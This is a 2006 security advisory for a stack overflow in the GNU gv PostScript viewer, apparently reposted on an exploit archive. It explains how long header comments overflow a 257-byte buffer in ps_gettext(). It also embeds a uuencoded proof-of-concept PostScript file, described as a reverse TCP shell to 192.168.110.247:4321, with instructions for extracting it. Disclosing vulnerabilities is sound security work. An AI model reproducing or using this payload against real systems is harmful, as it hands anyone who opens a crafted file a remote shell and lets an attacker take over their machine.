Home / os / solaris

gnugv362.txt

Posted on 13 November 2006

GNU gv Stack Overflow Vulnerability //----- Advisory Program : GNU gv Homepage : http://www.gnu.org/software/gv/ Tested version : 3.6.2 Found by : r.lifchitz at sysdream dot com This advisory : r.lifchitz at sysdream dot com Discovery date : 2006/11/06 Vendor notified : 2006/11/09 //----- Application description gv is a comfortable viewer of PostScript and PDF files for the X Window System. It uses the ghostscript PostScript interpreter and is based on the classic X front-end for gs, ghostview, which it has replaced now. //----- Description of vulnerability The 'gv' viewer is prone to a remote stack overflow vulnerability. This issue exists because the application fails to perform proper boundary checks before copying user-supplied data into process buffers. A remote attacker may execute arbitrary code in the context of a user running the application. As a result, the attacker can gain unauthorized access to the vulnerable computer. This issue is present itself in the 'ps_gettext()' function residing in the 'ps.c' file. Long comments in some specific headers (such as '%%DocumentMedia:') of PS files are unconditionally copied into 'text', a 257 character buffer on the stack. This issue is reported to affect gv 3.6.2, but earlier versions are likely prone to this vulnerability as well. Applications using embedded gv code may also be vulnerable. //----- Proof Of Concept * Linux IA32 Reverse TCP Shell on 192.168.110.247:4321 (uuencoded exploit) : begin 644 hello-reverseshell.ps M)2%04RU!9&]B92TS+C`*)254:71L93H@:&5L;&N<',*)25&;W(Z(%)E;F%U M9"!,:69C:&ET>B`M(%-Y<V1R96%M("T@:'1T<#HO+W=W=RYS>7-D<F5A;2YC M;VTO"B4E0F]U;F1I;F=";W@Z(#(T(#(T(#4X."`W-C@*)25$;V-U;65N=$UE M9&EA.B"0D)"0D)"0D#')@^GNV>[9="3T6X%S$](GKN*#Z_SB]./\_:&!3:R( MM'G`Q^G/;MB&&-BFUY7N8A/;DJT,B*PL;MA(&N3U*T=_^Q6;M+U)UQLW] M5,:*_47'C%O$_+%;QA[I'Z>NXD%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04'OO`0(04%!(#8Q,B`W.3(@,"`H*2`H*0HE)41O8W5M96YT1&%T M83H@0VQE86XW0FET"B4E3W)I96YT871I;VXZ($QA;F1S8V%P90HE)5!A9V5S M.B`Q"B4E4&%G94]R9&5R.B!!<V-E;F0*)24K(&5N8V]D:6YG($E33RTX.#4Y 9+3%%;F-O9&EN9PHE)45N9$-O;6UE;G1S"@`` ` end Use: $ uudecode < this-advisory.txt to extract the exploit. //----- Solution No known solution. You have to wait for a vendor upgrade and be careful with unknown PS files. //----- Impact Successful exploitation leads to remote code execution. //----- Credits Renaud Lifchitz r.lifchitz at sysdream dot com http://www.sysdream.com/ //----- Greetings Thanks to Ali Rahbar

 

TOP